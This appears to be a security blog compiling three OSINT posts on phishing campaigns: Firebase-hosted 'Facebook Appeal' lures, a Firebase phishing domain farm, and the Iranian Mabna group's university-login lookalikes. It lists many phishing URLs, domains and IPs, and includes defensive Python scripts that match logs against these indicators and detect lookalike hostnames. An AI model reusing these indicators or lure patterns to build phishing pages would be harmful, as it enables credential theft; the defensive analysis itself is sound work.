
Massive "Facebook Appeal" Themed Phishing Campaign Uses Google's Firebase Spotted in the Wild - An OSINT Analysis

October 29, 2021

I just came across a currently active phishing campaign that uses Google's Firebase as its hosting infrastructure to entice users into falling victim to a rogue and fake "Facebook Appeal" themed lure.

You can check out my initial analysis at my official Dark Web Onion here, as my initial post got censored by Google for violating its Terms of Service.


Sample malicious and rogue phishing domains known to have been involved in the campaign:


hxxp://publicaccount-facebook-46956.web.app

hxxp://publicappeal-348239237392.web.app

hxxp://publicappeal-9344858302239.web.app

hxxp://publicappeal-facebook.web.app

hxxp://publicappeal-form-fb-copyright102872.web.app

hxxp://publicappeal-form-fb-copyright104352.web.app

hxxp://publicappeal-form-fb-copyright119275.web.app

hxxp://publicappeal-form-fb-copyright126776.web.app

hxxp://publicappeal-form-fb-copyright171651.web.app

hxxp://publicappeal-form-fb-copyright18251.web.app

hxxp://publicappeal-form-fb-copyright18258.web.app

hxxp://publicappeal-form-fb-copyright18274.web.app

hxxp://publicappeal-form-fb-copyright18275.web.app

hxxp://publicappeal-form-fb-copyright182755.web.app

hxxp://publicappeal-form-fb-copyright18721.web.app

hxxp://publicappeal-form-fb-copyright187265.web.app

hxxp://publicappeal-form-fb-copyright187285.web.app

hxxp://publicappeal-form-fb-copyright18762.web.app

hxxp://publicappeal-form-fb-copyright19285.web.app

hxxp://publicappeal-form-fb-copyright19827.web.app

hxxp://publicappeal-form-fb-copyright981725.web.app

hxxp://publicappeal-form-page-unpublish1897.web.app

hxxp://publicappeal-from-fb-copyright12352.web.app

hxxp://publicappeal-from-fb-copyright12857.web.app

hxxp://publicappeal-page-unpublish-1827589.web.app

hxxp://publicappeal-page-unpublish1107276.web.app

hxxp://publicappeal-page-unpublish118172861.web.app

hxxp://publicappeal-page-unpublish18275.web.app

hxxp://publicappeal-page-unpublish182758.web.app

hxxp://publicappeal-page-unpublish1827586.web.app

hxxp://publicappeal-page-unpublish1827588.web.app

hxxp://publicappeal-page-unpublish182759.web.app

hxxp://publicappeal-page-unpublish18278652.web.app

hxxp://publicappeal-page-unpublish1827890.web.app

hxxp://publicappeal-page-unpublish187-36ac4.web.app

hxxp://publicappeal-page-unpublish187265.web.app

hxxp://publicappeal-page-unpublish18769.web.app

hxxp://publicappeal-page-unpublish1906392.web.app

hxxp://publicbusiness-appeal-form-129862.web.app

hxxp://publicbusiness-appeal-form125921.web.app

hxxp://publicfacebookappeal110631.web.app

hxxp://publicfb-appeal-form-29997.web.app

hxxp://publicfb-appeal-form-70f46.web.app

hxxp://publicfb-appeal-form-791bd.web.app

hxxp://publicfb-appeal-form-8276f.web.app

hxxp://publichouse-h3.web.app

hxxp://publicpage-appeal-unpublish1253631.web.app

hxxp://publicproject-8595314475285305009.web.app

hxxp://publicrestriction-appeal-business128.web.app

hxxp://publicreview2024545897534.web.app


Stay tuned!


Massive Phishing Campaign Domain Farm Spotted in the Wild Uses Google's Firebase Thousands of Users Affected - An OSINT Analysis

October 18, 2021

I've just stumbled across a pretty decent and massive phishing domain farm that uses Google's Firebase to host and distribute its rogue and malicious content.

In this post I'll provide actionable intelligence on the infrastructure behind it and discuss in depth the TTPs (Tactics, Techniques and Procedures) of the cybercriminals behind it.


Sample rogue and malicious URL known to have participated in the campaign:


hxxp://js-82wha8sw738.web.app/sc/css.css


Sample malicious and rogue responding IPs known to have participated in the campaign:


199.36.158.100

151.101.1.195

151.101.65.195


Sample screenshots of the rogue and malicious phishing domains known to have been involved in the campaign:









Sample rogue and malicious phishing domain portfolio known to have participated in the campaign:


0000.firebaseapp.com

02a8.web.app

11spielmacherbeta.firebaseapp.com

131023.firebaseapp.com

144110.firebaseapp.com

1493735036650.firebaseapp.com

164200.firebaseapp.com

177010.firebaseapp.com

177610.firebaseapp.com

17cc7.firebaseapp.com

212820.firebaseapp.com

abmay-d9b3b.web.app

abmay2-4abdf.web.app

adamlouie-c87d1.firebaseapp.com

adda-fenase.web.app

admininstatiles-5e702.firebaseapp.com

ads-restricted-id.web.app

aglae-f0665.firebaseapp.com

ahwma-de0bf.web.app

airbnb-70aba.firebaseapp.com

ajarwebsite-7d033.firebaseapp.com

all-scanner-cdf80.web.app

amao-dc021.web.app

ambitowebapp-2e394.firebaseapp.com

analytics-6a184.firebaseapp.com

angular2-hn.firebaseapp.com

angular7firestore-155e4.firebaseapp.com

aniapp-7ddc2.firebaseapp.com

anna-prone.web.app

api-project-723816548444.firebaseapp.com

appeal-form-fb-copyright102872.web.app

appeal-form-fb-copyright18258.web.app

appeal-form-fb-copyright187265.web.app

appeal-page-unpublish-1827589.web.app

appeal-page-unpublish1107276.web.app

appeal-page-unpublish118172861.web.app

appeal-page-unpublish18275.web.app

appeal-page-unpublish182758.web.app

appeal-page-unpublish1827586.web.app

appeal-page-unpublish182759.web.app

appeal-page-unpublish18278652.web.app

appeal-page-unpublish1827890.web.app

appeal-page-unpublish187-36ac4.web.app

appeal-page-unpublish18769.web.app

appemailhostingcha2.web.app

appy-760b5.firebaseapp.com

ararestaurant1.firebaseapp.com

arco-website-f9750.firebaseapp.com

aruba-postmaster-info.web.app

asmorx-1f6a2.web.app

asna-mod.web.app

ass-mote.web.app

asse-mofe.web.app

assets-0l61.firebaseapp.com

atarashii-atsui.web.app

au-ma-di.web.app

aude-mofe.web.app

audiscover-owawebapplications.web.app

auri-mo-da.web.app

auth-task1-m.web.app

auth20-outlook.web.app

authdemo-177a0.firebaseapp.com

authenticationuchu23.web.app

baffe-level.web.app

bandspace-console.web.app

baren-od.web.app

battle-22f22.firebaseapp.com

benali-acbe6.web.app

bestofjs-api-v1.firebaseapp.com

bi-1020101000x0.web.app

bigbt-aten.web.app

bingbrossvocalintel.web.app

bitbaink.web.app

bithunnb.web.app

bjqrasuoup.web.app

blockchain-assets-protection.web.app

blockchain-recovery-dda4d.web.app

bmazy2-0.web.app

bnp-verifi.web.app

boma-ren.firebaseapp.com

booking-hotesses-d7920.firebaseapp.com

bred-authentification-97-7.web.app

buten-dare.web.app

bzbikeruko.web.app

ca-regionale-department-a.web.app

cabs-ole.web.app

cadeau-par-plaisir.web.app

cale-mothe.web.app

camoam-d97a4.web.app

case-ofa.web.app

case100091254778.web.app

caseforpage100089481844.web.app

caseforpages100049151.web.app

caseforpages108412.web.app

caseforpages1885777.web.app

caseforpages1888888.web.app

caseforpages55222.web.app

caseforpages777422.web.app

caseforpages88174714.web.app

caten-opa.web.app

cau-quate.web.app

cen-kenase.web.app

cenle-one.web.app

centre-telephoneproinfo.web.app

chargement-service.web.app

chat-b2982.firebaseapp.com

chat-finpolo.firebaseapp.com

checkmailsawo5.web.app

checkmessagerievocalewebtel.web.app

checksweetmail6.web.app

cinhatena.web.app

cloud-space-auth-service.web.app

clouddoc-authorize.firebaseapp.com

club-note-vocale.web.app

code-mesme.web.app

cogne-menta.web.app

cojet-mole.web.app

cokade-made.firebaseapp.com

colimat-done.web.app

colo-mate.web.app

comasse-unade.web.app

come-measa.web.app

companyemailresync1.web.app

con-firma.firebaseapp.com

cones-dore.web.app

conh-ma.web.app

cop-ado.web.app

cope-ilna.web.app

cora-gas-me.web.app

cphost-7edd4.web.app

crawer-sur.web.app

credit-et-assurance07.web.app

cres-mate.web.app

crime-aune.web.app

crive-cible.web.app

csen-ted.web.app

d-validate.web.app

d3iioor0753gvdbfewypqb64.web.app

daisma-e7e6c.web.app

darrin-pendleton-j5286.web.app

dc4u-6e803.firebaseapp.com

decdo-chat2.firebaseapp.com

demachatendi36.web.app

demoitau-d3428.web.app

denabere-2c382.web.app

digital-book-9f870.firebaseapp.com

dmacenda.web.app

docsharex-authorize.firebaseapp.com

docuproject39-277-383-files.firebaseapp.com

dope-ufen.web.app

downloadfreeebookspdf-6e806.firebaseapp.com

downloadpdfreader-d7702.firebaseapp.com

drafty-43c88.firebaseapp.com

driveintuksouteast-falcaopla.web.app

dropdocument-c3829.web.app

dskdirect-5ba26.web.app

dw-website-fbc19.firebaseapp.com

eagle10.firebaseapp.com

ebookwngfgewarwle.web.app

edret-tropm.web.app

efetgreds.web.app

eins-done.web.app

eleven-bot-399b7.web.app

elimu-c1a38.firebaseapp.com

email-mweb-co-za-zimbra-1.firebaseapp.com

email-update-verify.web.app

email-verificationservices365.web.app

empacte-do.web.app

ems-obe.web.app

emsi-lobo.firebaseapp.com

end-losup.web.app

erfders-f6013.web.app

esote-mode.web.app

exness-mobile.web.app

explore-wetriansfering-web.web.app

exposedacne.web.app

f0ldgonn.firebaseapp.com

facebook-appeal1749902610052.web.app

facebook-appelcase32q1.web.app

facebookappeal-case10351001.web.app

facebookappealcase1884888444.web.app

facebookappealcase7174747444.web.app

facebookcase187444441.web.app

facebookcase188444.web.app

fares-one.web.app

fb-appeal-form-70f46.web.app

fb-appeal-form-791bd.web.app

fb-restricted-d12c2.web.app

fbappealform13111.web.app

fbforpages1848151.web.app

fbmail-case199418414.web.app

fbmail-pages100049194.web.app

fbpages-case10004915.web.app

fema-tode.web.app

fetfetaa-81119.web.app

fines-gining.web.app

firtserverunithpp.web.app

flape-man.web.app

flape-odade.web.app

fmvfhagpab.web.app

focus-online-news.web.app

fodes-mota.web.app

font-makeupe.web.app

foresta-mod.firebaseapp.com

foten-moda.web.app

francesbbv.web.app

freeebookspdf-9ab41.firebaseapp.com

freejobsnews-f8cb8.firebaseapp.com

freis-mode.web.app

gadjabadjala1.web.app

gare-train3.web.app

gene-marso.web.app

genie-alba.firebaseapp.com

girly-wallpaper-5b75f.web.app

godadyxs.web.app

gomas-12c01.web.app

gospel-living.web.app

goswapp-bsc.web.app

gotan-one.web.app

gotcha-67060.firebaseapp.com

grace-bijoux-14910.firebaseapp.com

green656dfbb5f31b1fe48c2391a6.web.app

gridsend-98f14.web.app

groupe-ca-authenticati-caisse.web.app

groupe-sa-accueil-autnenti.web.app

gweb-gc-gather-production.firebaseapp.com

gweb-miyagi.firebaseapp.com

hagenpau.web.app

histoire-clik.web.app

hiworksservicecenter.web.app

hon-macona.web.app

hounbvc-c7661.web.app

hsfkrkqogo.web.app

httpsaudiscover-owawebapplications.web.app

httpsdocument-download-902123.web.app

httpsfyregym-wetransfer.web.app

httpsjojo-wiza124.web.app

httpsjoovkuebea.web.app

httpsminxtex.firebaseapp.com

httpsprice-per-unit.firebaseapp.com

httpsprotectmimemimefrem.web.app

httpsworldvision-419f2.firebaseapp.com

hunin-one.web.app

hyle-fb82f.web.app

info-telephone-vocale.web.app

international-web-fb75a.web.app

isfane-osade.web.app

iydd-1b2d8.web.app

jams-jamz1234.web.app

jecta-f45df.firebaseapp.com

jentame-add.web.app

jes-mo-sad.web.app

jex-ulto.web.app

kaunte-mone.web.app

kebote-moda.web.app

kes-mole.web.app

kodrefse-nsf.web.app

l09162020-fixmailhelpdesk.web.app

laefhfdhkdsdv.web.app

lamaf-50e45.web.app

les-more.web.app

lg-roudcubeblack-access.web.app

lgeyfuusmg.web.app

licloud.web.app

licos-date.web.app

line-9ca1c.web.app

link-bb76d.web.app

lisen-ocun.web.app

live-support-82d11.firebaseapp.com

login-442v3f.web.app

loginfo-tkconf.web.app

lohsam-86765.web.app

lommsrecu3.firebaseapp.com

lono-jena.web.app

lote-masme.web.app

louams-62870.web.app

lthouse.web.app

m-cabanqueenligne-particuliers.web.app

m-orangebankenligne-id.web.app

m1technology.firebaseapp.com

maedz-5fdff.web.app

mail-8583e.web.app

mail-account-verify-f4723.web.app

mail-lcloud-com-account.web.app

mail-ovhcloud.web.app

mansan-4ca1c.web.app

may1110genstanbk.web.app

mbqbfhfmgr.web.app

memo-vocale-52636.web.app

mentipdf.web.app

mercadolibre-research.web.app

mms-sms-alert.firebaseapp.com

mo-aska-da.web.app

mobialmysyf.web.app

mobizzmperb.web.app

moce-add.web.app

moce-aude.web.app

molases-b652e.web.app

mon-tome.web.app

msgmessage-7f854.firebaseapp.com

mswordg.web.app

mta-round-cube.web.app

mxflexsub.web.app

my-bithumb.web.app

my-winbamk.web.app

mylogin-config.web.app

nale-ping.web.app

name-ocina.web.app

ne01u59l.firebaseapp.com

nera-mode.web.app

netw0rksolutions.web.app

newlink-c8a8f.web.app

njnapcdvzc.web.app

nopin-dod.web.app

nozed-uname.firebaseapp.com

ntzmttpmnttoepnlant.web.app

o-orangebank18-id.web.app

oaism-72827.web.app

ocaque-domen.firebaseapp.com

ocuso-aken.web.app

office-webmail-login-f0e3c.web.app

officeindex-file.web.app

officemailsharing-20cd3.web.app

offices-voicemail.web.app

oftenas-oweb.web.app

ojin-madij.web.app

olet-mado.web.app

omawo-14b8c.web.app

on-me-ro.firebaseapp.com

onee-a0488.web.app

oneone-19cd8.web.app

onga-moce.web.app

onlinepdfkwpmmkl.web.app

onsa-mode.web.app

orange-my-app.web.app

orangesmsprovocale.web.app

oras-moria.web.app

oroma-42f59.web.app

osale-mape.web.app

osaute-moca.web.app

others1-f7ce9.web.app

outline-auth-d7f99.web.app

outlookloffice365user09ngxsmd.web.app

outlookloffice365userp86aese6.web.app

outlooks-userserver.web.app

owa-signon-officeaccount.web.app

owablu84349439434.web.app

owserv220020.web.app

padma-3fbb8.web.app

page-appeal-unpublish1253631.web.app

pagebusiness-copyrightcase1256.web.app

pay-sera.web.app

phuongpndev.web.app

pokajca.web.app

poltunefrdonecodesms.web.app

popuyecash7.web.app

portail-messagerieorangesms.web.app

postmailservr-panel-centr.web.app

project2021c-42b13.firebaseapp.com

pry-ecommerce.web.app

put-media-lan.web.app

r-web-2a3a9.web.app

rbc-mainline.web.app

rbc-verifylogin5.web.app

rbclogin-line.web.app

readingwtagzdm.web.app

recording-c12f5.web.app

renard-trouillard.web.app

restore70174-coinbase-us.web.app

rjabldfrbg.web.app

romas-512bf.web.app

rooted-4da8a.web.app

rouncubemail.web.app

royalbill-a3y4.web.app

rufe-sun.web.app

saal-kejriwal.web.app

samda-3c88f.web.app

sarba-one.web.app

scorchvc.web.app


serve-8e8dc.web.app

server-authentication-332e1.web.app

servercpanel-afa12.web.app

service-vocalesmsprotelfixe.web.app

sharebox-onedrive-file-f692f.web.app

side-esone.web.app

sim-ote.web.app

skype-online04171.web.app

slackchatv1.firebaseapp.com

snaptik.web.app

soci-molen.web.app

sode-mape.web.app

soden-olma.web.app

sofe-inchena.web.app

sofe-tane.web.app

solen-conda.web.app

somas-b88a0.web.app

sone-masa.web.app

sonta-maline.web.app

sore-modabe.web.app

soure-made.web.app

sparkassbank-de.web.app

srey-deocs.web.app

sroxma-ab2cc.web.app

sudo-mone.web.app

sugen-oda.web.app

sun-maupe.web.app

sunge-ode.firebaseapp.com

suone-bena.web.app

swiftshare-content-auth.web.app

tittot-a8505.web.app

tm-etiquetado.web.app

tome-done.web.app

totem1.web.app

totem2.web.app

tousou-posoto3.web.app

trdsmccdb7386cbf3ba0b0b8d.web.app

truein-264db.web.app

ugen-orabe.web.app

uiinlcuo37oed.web.app

un-foreste.web.app

unt-morelle.web.app

update-45190ca.web.app

user-45190ca21.web.app

userca-58ce4.web.app

usmin-moda.web.app

validate-clientrbc.web.app

vandameman4.web.app

verberuyer7.web.app

verif-loginrbc.web.app

verify-48181.web.app

verify-user-rbc.web.app

verifywell-85477.web.app

vkmqnvyfwd1111.web.app

vmta-mod.web.app

vocaleproidorange.web.app

votre-boitevocale-fixe.firebaseapp.com

wdfyxklmba.web.app

web-bf4.web.app

web-e1f6d.web.app

web874830-98375-90232.web.app

webmail-a2846.web.app

webmail-control-9efc7.web.app

wecluihfrf-76tygh.web.app

wedpfoaliculate-resmazm.web.app

westernfoodmaincourse.web.app

wetranslatetransfers-coxsola.firebaseapp.com

wetrnafers.web.app

whatsapp-clone-teamwork.firebaseapp.com

win-more-0x.web.app

winx-fbac0.web.app

wix-engage-visitors-prod-0.firebaseapp.com

wix-engage-visitors-prod-10.firebaseapp.com

wix-engage-visitors-prod-20.firebaseapp.com

wo0923536-902453-908563.web.app

wraxdne.web.app

www.firebaseapp.com

www.web.app

x0x0x10010-0100.web.app

x48652.web.app

xamua-7cb66.web.app

xcio-00000auth.web.app

xm01-18c1f.web.app

xn--87487387348739-16aa.web.app

xtpma4ep.firebaseapp.com

zoho-active.web.app

zoho-adminserv.web.app

zoho-mailservices.web.app

zoho-online.web.app

zoho-validationserv.web.app

zxtst-44902.firebaseapp.com
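Both Firebase posts above (the "Facebook Appeal" campaign and this domain farm) list project hostnames under Google's `.web.app` and `.firebaseapp.com` suffixes whose project names carry the lure: appeal, copyright, unpublish, and bank or webmail brand names. The script below is an added example, not the author's code: it refangs the page's `hxxp://` notation, extracts the Firebase project name, groups it by lure keyword, and checks constructed proxy log lines against the indicator set, also flagging unlisted Firebase hosts whose project name matches a lure keyword. The indicator subset, the log format and the keyword groups are assumptions.

```python
from urllib.parse import urlsplit

# Constructed subset of the indicators listed above, in the page's defanged
# "hxxp://" notation and as bare hostnames (assumed sample, not the full list).
DEFANGED_IOCS = """
hxxp://publicappeal-form-fb-copyright102872.web.app
hxxp://publicappeal-page-unpublish18275.web.app
rbc-verifylogin5.web.app
zoho-mailservices.web.app
mail-ovhcloud.web.app
analytics-6a184.firebaseapp.com
"""

# Hosting suffixes Firebase Hosting hands out to every project.
FIREBASE_SUFFIXES = (".web.app", ".firebaseapp.com")

# Lure keywords that recur in the listed project names; the grouping is an assumption.
LURE_KEYWORDS = {
    "facebook": ("facebook", "fb", "appeal", "copyright", "unpublish", "caseforpage"),
    "banking": ("rbc", "bnp", "orangebank", "sparkass", "coinbase", "bithumb"),
    "webmail": ("zoho", "outlook", "owa", "webmail", "roundcube", "mail-"),
}


def refang(indicator: str) -> str:
    """Restore the http(s) scheme that the page's hxxp notation hides."""
    s = indicator.strip()
    if s.startswith("hxxps://"):
        return "https://" + s[len("hxxps://"):]
    if s.startswith("hxxp://"):
        return "http://" + s[len("hxxp://"):]
    return s


def host_of(indicator: str) -> str:
    """Hostname of a (possibly defanged, possibly scheme-less) indicator, lower-cased."""
    url = refang(indicator)
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def firebase_project(host: str) -> str:
    """Project name in front of a Firebase suffix, or "" for non-Firebase hosts."""
    for suffix in FIREBASE_SUFFIXES:
        if host.endswith(suffix):
            return host[: -len(suffix)]
    return ""


def classify(host: str) -> str:
    """Lure family suggested by the project name, or "other"."""
    project = firebase_project(host)
    for family, words in LURE_KEYWORDS.items():
        if any(w in project for w in words):
            return family
    return "other"


def load_iocs(text: str = DEFANGED_IOCS) -> set:
    return {host_of(line) for line in text.splitlines() if line.strip()}


# Constructed proxy log lines: "<epoch> <client> <status> <url>" (assumed format).
PROXY_LOG = """
1635500000.123 10.0.0.5 TCP_MISS/200 https://publicappeal-page-unpublish18275.web.app/index.html
1635500001.456 10.0.0.7 TCP_MISS/200 https://www.example.org/
1635500002.789 10.0.0.9 TCP_MISS/200 https://rbc-verifylogin5.web.app/login
1635500003.000 10.0.0.9 TCP_MISS/200 https://something-legit-12345.web.app/app.js
1635500004.500 10.0.0.11 TCP_MISS/200 https://fb-appeal-form-zzzz9.web.app/
"""


def match_log(log: str = PROXY_LOG, iocs: set = None) -> list:
    """Return (client, host, family, reason) for each line hitting an indicator,
    or any unlisted Firebase host whose project name carries a lure keyword."""
    iocs = load_iocs() if iocs is None else iocs
    hits = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        client, url = parts[1], parts[3]
        host = (urlsplit(url).hostname or "").lower()
        if host in iocs:
            hits.append((client, host, classify(host), "ioc-match"))
        elif firebase_project(host) and classify(host) != "other":
            hits.append((client, host, classify(host), "lure-keyword"))
    return hits


if __name__ == "__main__":
    for hit in match_log():
        print(*hit)
```

The keyword rule is deliberately separate from the exact-match rule: the farm rotates project names faster than any list can follow, so an alert on "Firebase host plus brand keyword" catches the next `publicappeal-*` project while an exact indicator match stays high-confidence. Legitimate Firebase projects that happen to contain a keyword (such as "fb" inside a random suffix) will surface as lower-priority `lure-keyword` hits rather than disappear.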


Stay tuned!


Exposing FBI's Most Wanted Cybercriminals - Iran's Mabna Hackers - An OSINT Analysis

March 03, 2021
Dear blog readers,

I've decided to share some of the actionable intelligence I have at my disposal regarding the FBI's Most Wanted Iran-based Mabna Hackers, which I originally outlined in the second release of "A Qualitative and Technical Collection OSINT-Enriched Analysis of the Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital Security Team", where you can also obtain a copy of the first release, entitled "Assessing The Computer Network Operation (CNO) Capabilities of the Islamic Republic of Iran". Together the reports catch up on what Iran-based hackers and hacking groups have been up to through the present day, and represent one of the most comprehensive and in-depth publicly accessible reports on Iran's hacking scene.

Sample screenshots of Mabna Institute including the associated Web sites where the information is offered:








Sample phishing URLs known to have been involved in the campaign:

ezvpn.mskcc.saea.ga

library.asu.saea.ga

library.lehigh.saea.ga

moodle.ucl.ac.saea.ga

saea.ga

unex.learn.saea.ga

unomaha.on.saea.ga

www.uvic.saea.ga

catalog.lib.usm.edu.seae.tk

elearning.uky.edu.seae.tk

www.aladin.wrlc.org.seae.tk

alexandria.rice.ulibr.ga

cmich.ulibr.ga

columbia.ulibr.ga

edu.edu.libt.cf

ezproxy-authcate.lib.monash.ulibr.ga

login.revproxy.brown.edu.edu.libt.cf

ezproxy-authcate.monash.lib.ulibr.ga

ezproxy-f.deakin.au.ulibr.ga

lib.dundee.ac.uk.ulibr.ga

cas.usherbrooke.ca.cavc.tk

catalog.lib.ksu.edu.cavc.tk

isa.epfl.ch.cavc.tk

login.vcu.edu.cavc.tk

www.med.unc.edu.cavc.tk

cas.iu.edu.cavc.tk

ltuvpn.latrobe.edu.au.reactivation.in

passport.pitt.edu.reactivation.in

edu.login.revproxy.brown.edu.libt.cf

shibboleth.nyu.edu.reactivation.in

login.revproxy.brown.edu.login.revproxy.brown.edu.libt.cf

weblogin.pennkey.upenn.edu.reactivation.in

webmail.reactivation.in

www.ezlibproxy1.ntu.edu.sg.reactivation.in

www.ezpa.library.ualberta.ca.reactivation.in

www.lib.just.edu.jo.reactivation.in

www.passport.pitt.edu.reactivation.in

shib.ncsu.ulibr.cf/

www.shibboleth.nyu.edu.reactivation.in

www.weblogin.pennkey.upenn.edu.reactivation.in

ezlibproxy1.ntu.edu.sg.reactivation.in

login.revproxy.brown.edu.libt.cf

weblogin.umich.edu.lib2.ml

catalog.sju.edu.mncr.tk

ezpa.library.ualberta.ca.reactivation.in

lib.just.edu.jo.reactivation.in

login.ezproxy.lib.purdue.edu.reactivation.in

login.libproxy.temple.shibboleth2.uchicago.ulibr.cf

shib.ncsu.shibboleth2.uchicago.ulibr.cf

shibboleth2.uchicago.shibboleth2.uchicago.ulibr.cf

singlesignon.gwu.shibboleth2.uchicago.ulibr.cf

webauth.ox.ac.uk.shibboleth2.uchicago.ulibr.cf

edu.libt.cf

login.libproxy.temple.ulibr.cf

shib.ncsu.ulibr.cf

singlesignon.gwu.ulibr.cf

webauth.ox.ac.uk.ulibr.cf

library.cornell.ulibr.ga

login.ezproxy.gsu.ulibr.ga

shibboleth2.uchicago.ulibr.cf

login.library.nyu.ulibr.ga

mail.ulibr.ga

webcat.lib.unc.ulibr.ga

www.ulibr.ga

www.alexandria.rice.ulibr.ga

www.cmich.ulibr.ga

www.columbia.ulibr.ga

www.ezproxy-authcate.lib.monash.ulibr.ga

www.ezproxy-authcate.monash.lib.ulibr.ga

www.ezproxy-f.deakin.au.ulibr.ga

www.lib.dundee.ac.uk.ulibr.ga

www.library.cornell.ulibr.ga

www.login.ezproxy.gsu.ulibr.ga

www.login.library.nyu.ulibr.ga

auth.berkeley.edu.libna.ml

sso.lib.uts.edu.au.libna.ml

bb.uvm.edu.cvre.tk

cline.lib.nau.edu.cvre.tk

illiad.lib.binghamton.edu.cvre.tk

libcat.smu.edu.cvre.tk

login.brandeis.edu.cvre.tk

msim.cvre.tk

libcat.library.qut.nsae.ml

www.webcat.lib.unc.ulibr.ga
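The hostnames above follow one construction: a victim institution's real login or proxy FQDN (`login.revproxy.brown.edu`, `webauth.ox.ac.uk`) is placed in front of a throwaway registrable domain (`libt.cf`, `ulibr.ga`, `reactivation.in`), or a bare SSO label such as `shibboleth2` is combined with the school's name. The following is an added example, not the author's code, of a defender-side check that flags both shapes; it generalises to the brand-in-subdomain pattern beyond universities (for instance `auth.facebook.com.<other-domain>`). The allow-list of legitimate domains, the small public-suffix set and the sample hostnames are constructed assumptions.

```python
# Two-label public suffixes that occur in the hostnames above; a production
# check should use the full Public Suffix List (assumption: this small set).
MULTI_LABEL_SUFFIXES = {"ac.uk", "edu.au", "edu.sg", "edu.jo", "co.za"}

# Constructed allow-list of institutions and brands whose portals are imitated.
LEGIT_DOMAINS = {
    "brown.edu", "nyu.edu", "upenn.edu", "pitt.edu", "uchicago.edu",
    "ox.ac.uk", "monash.edu", "ntu.edu.sg", "ualberta.ca", "facebook.com",
}

# Labels typical of university single-sign-on and library proxy hosts.
SSO_KEYWORDS = {"shibboleth", "shibboleth2", "ezproxy", "revproxy", "libproxy", "weblogin"}


def registrable_domain(host: str) -> str:
    """Registrable part of host: 'ox.ac.uk' for webauth.ox.ac.uk, 'libt.cf' for ...libt.cf."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def embedded_legit_domains(host: str, legit=LEGIT_DOMAINS) -> list:
    """Allow-listed domains that appear label-aligned inside host without being
    its registrable domain, i.e. the host is borrowing their name."""
    labels = host.lower().rstrip(".").split(".")
    reg = registrable_domain(host)
    found = []
    for domain in sorted(legit):
        if domain == reg:
            continue  # the host really belongs to this domain
        dl = domain.split(".")
        n = len(dl)
        if any(labels[i:i + n] == dl for i in range(len(labels) - n + 1)):
            found.append(domain)
    return found


def sso_keywords_off_domain(host: str, legit=LEGIT_DOMAINS) -> list:
    """SSO/proxy-style labels on a host whose registrable domain is not allow-listed,
    which catches brand-only imitations such as shibboleth2.<school>.<junk-tld>."""
    host = host.lower().rstrip(".")
    if registrable_domain(host) in legit:
        return []
    return sorted(set(host.split(".")) & SSO_KEYWORDS)


def is_lookalike(host: str, legit=LEGIT_DOMAINS) -> bool:
    return bool(embedded_legit_domains(host, legit) or sso_keywords_off_domain(host, legit))


def scan(hosts, legit=LEGIT_DOMAINS) -> list:
    """(host, reason) for every host that trips either rule."""
    out = []
    for h in hosts:
        reasons = []
        emb = embedded_legit_domains(h, legit)
        if emb:
            reasons.append("embeds " + ",".join(emb))
        kw = sso_keywords_off_domain(h, legit)
        if kw:
            reasons.append("sso-keyword " + ",".join(kw))
        if reasons:
            out.append((h, "; ".join(reasons)))
    return out


# Constructed sample mixing hostnames shaped like the ones listed above with
# the legitimate portals they imitate.
SAMPLE_HOSTS = [
    "login.revproxy.brown.edu.libt.cf",
    "webauth.ox.ac.uk.ulibr.cf",
    "shibboleth2.uchicago.ulibr.cf",
    "auth.facebook.com.megavids.org",
    "shibboleth.nyu.edu",
    "webauth.ox.ac.uk",
    "www.facebook.com",
]

if __name__ == "__main__":
    for host, reason in scan(SAMPLE_HOSTS):
        print(host, "->", reason)
```

The first rule is precise because it requires label-aligned matches, so `nyu.edu` inside `shibboleth.nyu.edu` is accepted while the same labels inside `shibboleth.nyu.edu.reactivation.in` are not. The keyword rule is noisier and depends on a complete allow-list; in practice it is fed from passive DNS or certificate-transparency feeds for newly seen hostnames rather than from user traffic.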

Sample domains known to have been involved in the campaign:

mlibo.ml

blibo.ga

azll.cf

azlll.cf

lzll.cf

jlll.cf

elll.cf

lllib.cf

tsll.cf

ulll.tk

tlll.cf

libt.ga

libk.ga

libf.ga

libe.ga

liba.gq

libver.ml

ntll.tk

ills.cf

vtll.cf

clll.tk

stll.tk

llii.xyz

lill.pro

eduv.icu

univ.red

unir.cf

unir.gq

unisv.xyz

unir.ml

unin.icu

unie.ml

unip.gq

unie.ga

unip.cf

nimc.ga

nimc.ml

savantaz.cf

unie.gq

unip.ga

unip.ml

unir.ga

untc.me

jhbn.me

unts.me

uncr.me

lib-service.com

unvc.me

untf.me

nimc.cf

anvc.me

ebookfafa.com

nicn.gq

untc.ir

librarylog.in

llli.nl

lllf.nl

libg.tk

ttil.nl

llil.nl

lliv.nl

llit.site

flil.cf

e-library.me

cill.ml

fill.cf

libm.ga

eill.cf

llib.cf

eill.ga

nuec.cf

illl.cf

cnen.cf

aill.nl

eill.nl

mlib.cf

ulll.cf

nlll.cf

clll.nl

llii.cf

etll.cf

1edu.in

aill.cf

atna.cf

atti.cf

aztt.tk

cave.gq

ccli.cf

cnma.cf

cntt.cf

crll.tk

csll.cf

ctll.tk

cvnc.ga

cvve.cf

czll.tk

cztt.tk

euca.cf

euce.in

ezll.tk

ezplog.in

ezproxy.tk

eztt.tk

flll.cf

iell.tk

iull.tk

izll.tk

lett.cf

lib1.bid

lib1.pw

libb.ga

libe.ml

libg.cf

libg.ga

libg.gq

libloan.xyz

libnicinfo.xyz

libraryme.ir

libt.ml

libu.gq

lill.gq

llbt.tk

llib.ga

llic.cf

llic.tk

llil.cf

llit.cf

lliv.tk

llse.cf

ncll.tk

ncnc.cf

nctt.tk

necr.ga

nika.ga

nsae.ml

nuec.ml

rill.cf

rnva.cf

rtll.tk

sctt.cf

shibboleth.link

sitl.tk

slli.cf

till.cf

titt.cf

uill.cf

uitt.tk

ulibe.ml

ulibr.ga

umlib.ml

umll.tk

uni-lb.com

unll.tk

utll.tk

vsre.cf

web2lib.info

xill.tk

zedviros.ir

zill.cf

Sample IPs known to have been involved in the campaign:

103.241.3.91

104.152.168.23

107.180.57.7

107.180.58.47

138.201.17.56

144.217.120.73

144.76.189.80

162.218.237.3

167.114.103.215

173.254.239.2

176.31.33.115

178.33.115.10

184.95.37.90

185.105.185.22

185.28.21.83

185.55.227.104

185.86.180.250

188.40.34.186

